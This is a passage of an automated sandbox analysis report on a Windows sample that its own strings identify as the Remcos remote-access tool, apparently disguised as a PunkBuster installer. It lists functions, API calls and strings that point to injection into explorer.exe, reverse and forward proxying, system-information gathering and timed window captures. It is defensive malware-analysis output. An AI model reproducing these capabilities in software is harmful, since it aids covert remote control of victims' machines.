                                              • _free.LIBCMT ref: 00106E01
                                              • _free.LIBCMT ref: 00106E0C
                                              • _free.LIBCMT ref: 00106E17
                                              • _free.LIBCMT ref: 00106E22
                                              • _free.LIBCMT ref: 00106E2D
                                              • _free.LIBCMT ref: 00106E38
                                              • _free.LIBCMT ref: 00106E46
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d2fff9de772c22dabfd63783a88431a84e9e7e0cde74488d30f5b7229a65ea1b
                                              • Instruction ID: 1e91b7432a37d6593a24ff3c9a074a75cab4aff2b8a16235c39c158f2ef69ca1
                                              • Opcode Fuzzy Hash: d2fff9de772c22dabfd63783a88431a84e9e7e0cde74488d30f5b7229a65ea1b
                                              • Instruction Fuzzy Hash: 5211777560010CEFCB05FF54C942CD93B65EF14360B55C4A5B9885F1A6DB71EA749F80
                                              Function 0042B120 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 239windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0042AC50: LoadLibraryA.KERNEL32(?,?,0042B213,00000000), ref: 0042AC74
                                              • SendMessageA.USER32(?,0000045B,00000001,00000000), ref: 0042B395
                                              • SendMessageA.USER32(?,00000445,00000000,00000001), ref: 0042B3A6
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,FFFFFFFF,00000000,?,?,?,000000FF,?), ref: 0042B3BB
                                              Strings
                                              • RICHEDIT, xrefs: 0042B21A
                                              • Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll, xrefs: 0042B234
                                              • RICHEDIT50W, xrefs: 0042B1CC
                                              • RichEdit20A, xrefs: 0042B1EA
                                              • EDIT, xrefs: 0042B15D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: MessageSend$LibraryLoadWindow
                                              • String ID: EDIT$Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll$RICHEDIT$RICHEDIT50W$RichEdit20A
                                              • API String ID: 3695014736-220143130
                                              • Opcode ID: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction ID: fd1f3e6eab14dd8ec65f4d08ef4d7de20f72b4bfebd2e21d27a059feec06a27f
                                              • Opcode Fuzzy Hash: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction Fuzzy Hash: B08102702047508BD310DF28E845BAFB7A0FF95368F540B5EF5A5973D2C778A8058BAA
                                              Function 000D9128 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174sleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000D912D
                                              • GdiplusStartup.GDIPLUS(00133AF0,?,00000000), ref: 000D915F
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 000D91EB
                                              • Sleep.KERNEL32(000003E8), ref: 000D926D
                                              • GetLocalTime.KERNEL32(?), ref: 000D927C
                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 000D9365
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                              • API String ID: 489098229-3790400642
                                              • Opcode ID: fe2d4490dae4c22f34141791f2ce2c2759129795435502495afa756c3967c8f1
                                              • Instruction ID: 9ecea1e25b6bf8f06498f466fbf02e9a890cbf02c160447e79ce8294567310c1
                                              • Opcode Fuzzy Hash: fe2d4490dae4c22f34141791f2ce2c2759129795435502495afa756c3967c8f1
                                              • Instruction Fuzzy Hash: 80518D71A00254AACB14BBB4DC56EFE7BB9AB56300F40406EF446E7283EF345E85C761
                                              Function 00407F0C Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 167COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00408012
                                              • _strncat.LIBCMT ref: 00408025
                                                • Part of subcall function 004070CD: __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                                • Part of subcall function 00407E0F: __EH_prolog.LIBCMT ref: 00407E14
                                                • Part of subcall function 0040D2B8: __EH_prolog.LIBCMT ref: 0040D2BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog$_strncat$DirectorySystem
                                              • String ID: %s %s$ PunkBuster DLL Install Files Included$32-bit$64-bit$Starting PunkBuster Service Installer (v%d.%d) (%s)$\LogFiles\PunkBuster\pbsvc.log
                                              • API String ID: 1593959897-659667646
                                              • Opcode ID: d1c17a080f57daa9b324116a8c7c3789a7d1ba216c9fe5bd63ab5f575e2b63dd
                                              • Instruction ID: c8cbcd95914244e00445ad1739eb842854e526158c222c1c77cc694d2deaaf9e
                                              • Opcode Fuzzy Hash: d1c17a080f57daa9b324116a8c7c3789a7d1ba216c9fe5bd63ab5f575e2b63dd
                                              • Instruction Fuzzy Hash: FE51B3B1900208AEDB14EB65DC85BDD77B9AF04318F1041FEF209A71D2DB795A85CF58
                                              Function 00115139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00115DAF), ref: 0011515C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DecodePointer
                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                              • API String ID: 3527080286-3064271455
                                              • Opcode ID: 9ace6e243a05d040f2d9c6e8f83a484804f0fc70f4efdf4a0aaa0ab7e927357a
                                              • Instruction ID: 49291643630e090107386766ad68810f1ba1be324abb3586ee005cb39a329f06
                                              • Opcode Fuzzy Hash: 9ace6e243a05d040f2d9c6e8f83a484804f0fc70f4efdf4a0aaa0ab7e927357a
                                              • Instruction Fuzzy Hash: 16518E75900D09CBDF1CCF98DA4C1ECBBB6FB89340F6501A5D891BB254CBB18994CB19
                                              Function 000D65FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 000D665C
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • Sleep.KERNEL32(00000064), ref: 000D6688
                                              • DeleteFileW.KERNEL32(00000000), ref: 000D66BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreateDeleteExecuteShellSleep
                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                              • API String ID: 1462127192-2001430897
                                              • Opcode ID: 3b0f4e5ed8a1838e536b44f8d3504e47eaa17c7ca19b4e901445be6a445bc93e
                                              • Instruction ID: 739d322f9ecc5c07a419f02492a51f7117183c85fc9f2c36883bff76fae5910a
                                              • Opcode Fuzzy Hash: 3b0f4e5ed8a1838e536b44f8d3504e47eaa17c7ca19b4e901445be6a445bc93e
                                              • Instruction Fuzzy Hash: 483132719002199ADB18FBA0DCA2FEE7774AF11704F00416DF906A31D3EF705A8ACAA4
                                              Function 000C6616 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 98COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00134A28,00000000,001342E0,00003000,00000004,00000000,00000001), ref: 000C6647
                                              • GetCurrentProcess.KERNEL32(00134A28,00000000,00008000,?,00000000,00000001,00000000,000C68BB,C:\Users\user\Desktop\4wECQoBvYC.exe), ref: 000C6705
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentProcess
                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                              • API String ID: 2050909247-4242073005
                                              • Opcode ID: 2162dc2db865d76bf818bc243f97668410a8babe24b5893b3279b0c7a8d99351
                                              • Instruction ID: 7746204e33dc162bd2307e85b9fe5ec0d082e85312a0147e3021ade3b13d28f4
                                              • Opcode Fuzzy Hash: 2162dc2db865d76bf818bc243f97668410a8babe24b5893b3279b0c7a8d99351
                                              • Instruction Fuzzy Hash: 5231D571280710BFC320EB64EC4AFAE77B9FB44712F50051CF50297AA2EB72A8409B65
                                              Function 000DC96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000DC988
                                                • Part of subcall function 000DCA1F: RegisterClassExA.USER32(00000030), ref: 000DCA6C
                                                • Part of subcall function 000DCA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 000DCA87
                                                • Part of subcall function 000DCA1F: GetLastError.KERNEL32 ref: 000DCA91
                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 000DC9BF
                                              • lstrcpynA.KERNEL32(00133B68,Remcos,00000080), ref: 000DC9D9
                                              • Shell_NotifyIconA.SHELL32(00000000,00133B50), ref: 000DC9EF
                                              • TranslateMessage.USER32(?), ref: 000DC9FB
                                              • DispatchMessageA.USER32(?), ref: 000DCA05
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 000DCA12
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                              • String ID: Remcos
                                              • API String ID: 1970332568-165870891
                                              • Opcode ID: 875409060518c86494d321cab3d093f11a80877edeebe1e71b1a5456897a9301
                                              • Instruction ID: 60bd58eb1a9800acd27655499fa57e007620120415949c358bd1047f253a617b
                                              • Opcode Fuzzy Hash: 875409060518c86494d321cab3d093f11a80877edeebe1e71b1a5456897a9301
                                              • Instruction Fuzzy Hash: 640180B1504248EBE7109FA5ED0DEDABBBCBB85B04F008019F621D36E4D7B891C9DB24
                                              Function 0010B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6757e9dcaf1316d0f4b0215dcbd4141e6191b9b27de938b39f355d2e38997b2
                                              • Instruction ID: 73a5db31b6a29d5983238e39fc4645baa1eccffe5599c7f8b052049d8d2885e4
                                              • Opcode Fuzzy Hash: a6757e9dcaf1316d0f4b0215dcbd4141e6191b9b27de938b39f355d2e38997b2
                                              • Instruction Fuzzy Hash: 6AC1C674D08249AFDF15DFA8C881BAD7BB5BF5A310F184099E494AB3D2C7B09981CB61
                                              Function 00112B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00112E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00112BD6
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112C59
                                              • __alloca_probe_16.LIBCMT ref: 00112C91
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00112E03,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112CEC
                                              • __alloca_probe_16.LIBCMT ref: 00112D3B
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112D03
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112D7F
                                              • __freea.LIBCMT ref: 00112DAA
                                              • __freea.LIBCMT ref: 00112DB6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                              • String ID:
                                              • API String ID: 201697637-0
                                              • Opcode ID: 2d64690f36703a06141b38306ee372aaa3869c81b3b6bcf9e020c8f965e07dfb
                                              • Instruction ID: a8440bddfe45f14634c3673684817c3dad9e29bae353977d2768716672a5956d
                                              • Opcode Fuzzy Hash: 2d64690f36703a06141b38306ee372aaa3869c81b3b6bcf9e020c8f965e07dfb
                                              • Instruction Fuzzy Hash: 4491CF72E0421A9FDF288EA4D891EEEBBB5AB09310F144579E905E7281D734DCE0C7A4
                                              Function 00494420 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 282COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00494477
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: !$%02d$%03d$%04d$Courier New$L
                                              • API String ID: 885266447-3614883530
                                              • Opcode ID: 0c0297550bbf8ddfe022dab381adfa121dc131ff9338fba9037832900f50528e
                                              • Instruction ID: 60ab0369f6dd2dbcf4d7d1fdddb2370bc4fe2c9c9bfc25ac5e0f27450f90c011
                                              • Opcode Fuzzy Hash: 0c0297550bbf8ddfe022dab381adfa121dc131ff9338fba9037832900f50528e
                                              • Instruction Fuzzy Hash: AEB1D5701083809FD725DF28C840BAFBBE0AFC5714F244A6EF59987391D7799846CB9A
                                              Function 001043F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • _memcmp.LIBVCRUNTIME ref: 001046A3
                                              • _free.LIBCMT ref: 00104714
                                              • _free.LIBCMT ref: 0010472D
                                              • _free.LIBCMT ref: 0010475F
                                              • _free.LIBCMT ref: 00104768
                                              • _free.LIBCMT ref: 00104774
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorLast$_abort_memcmp
                                              • String ID: C
                                              • API String ID: 1679612858-1037565863
                                              • Opcode ID: 0c091e18e292869733651a127b00890ab3f1d8dabea876f0fd01fb934d19709a
                                              • Instruction ID: bbb1d936a04800efd8456feceb7949254e932ff7bdcfaef8cd8994a69d447796
                                              • Opcode Fuzzy Hash: 0c091e18e292869733651a127b00890ab3f1d8dabea876f0fd01fb934d19709a
                                              • Instruction Fuzzy Hash: E6B14BB5A01219DFDB24DF18C884BADB7B4FB08314F1445AAE989A7391E771AE90CF40
                                              Function 00402104 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 237COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00402109
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                                • Part of subcall function 004015D3: __EH_prolog.LIBCMT ref: 004015D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $Copy$PunkBuster Services Test$button$dialog$text
                                              • API String ID: 3519838083-3589454768
                                              • Opcode ID: 76b5a08b1cfa5c7d5fbc7861b65c1533f7a228ccc7332dff63859a40f55cd7ea
                                              • Instruction ID: ed48d589d5e5facd202ec40a79dd8d9ece5d7fb634fdabafeb78919855fc2bc3
                                              • Opcode Fuzzy Hash: 76b5a08b1cfa5c7d5fbc7861b65c1533f7a228ccc7332dff63859a40f55cd7ea
                                              • Instruction Fuzzy Hash: 14A19E71D00249EEEB05DFA4CC49BEEBBB8AF04308F10856EE551B62D1DBB85A44CB65
                                              Function 000D39C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tcp$udp
                                              • API String ID: 0-3725065008
                                              • Opcode ID: 907a32a88ba1434a6b4c91f170ff56dd5cf8f902a1db229a2fdcf7abc5ee06ce
                                              • Instruction ID: c7d0cf3a97a34b47ead2e5826f8cb70b90fd98f382fcd6f1773339560b149240
                                              • Opcode Fuzzy Hash: 907a32a88ba1434a6b4c91f170ff56dd5cf8f902a1db229a2fdcf7abc5ee06ce
                                              • Instruction Fuzzy Hash: 51719830A093528FDB68CF58848872BBAE4AF88754F14442FF986A7351D774DE44CBA3
                                              Function 000D0314 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 192COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Eventinet_ntoa
                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                              • API String ID: 3578746661-168337528
                                              • Opcode ID: b3b638b25cfc2b80e2b861e024340209547136b692c2722cbe3ec964258240f1
                                              • Instruction ID: 9658731bf5d9f0c22595b8b87170d00dcfaac26b2752dee134de41e12fd48edd
                                              • Opcode Fuzzy Hash: b3b638b25cfc2b80e2b861e024340209547136b692c2722cbe3ec964258240f1
                                              • Instruction Fuzzy Hash: 7451C371A04310ABD704FBB8D85AFEE36A69B82310F40452EF80A977D7DF249D45C7A2
                                              Function 004241D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 187windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDialogIndirectParamA.USER32(00000000,?,?,004B4820,00000000), ref: 00424232
                                              • SetWindowLongA.USER32(?,000000EC,?), ref: 00424285
                                              • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00424576,00000000,?,?), ref: 004242B2
                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 0042433C
                                              • MoveWindow.USER32(?,?,?,00000000,?,00000000,?,?,?,?,?,?), ref: 004243CC
                                              • SetWindowTextA.USER32(?,00000000), ref: 004243E7
                                              Strings
                                              • Can't create dialog using memory template, xrefs: 00424242
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Window$CreateDialogIndirectLongMessageMoveParamSendText
                                              • String ID: Can't create dialog using memory template
                                              • API String ID: 3198842173-1473080150
                                              • Opcode ID: 842f8139567f96003f6765ed8ac3f988ef3293f25dd77c38576921955f773a03
                                              • Instruction ID: bca2413309c077372c06934a87c6b1bb22e49cf21180dde4032647e8baf410af
                                              • Opcode Fuzzy Hash: 842f8139567f96003f6765ed8ac3f988ef3293f25dd77c38576921955f773a03
                                              • Instruction Fuzzy Hash: D9614A753042019FC308CF65D885FABB7E9EFC8744F14462EF99A87291DB34E9058B6A
                                              Function 0040649F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 152COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004064A4
                                              • 80000002.OLEAUT32(?,?,?,?,?,?,?,?,00000001,?,00000401), ref: 0040651F
                                              • 80000006.COMCTL32(?,?,?,?,?,?,?,?,00000001,?,00000401), ref: 00406630
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
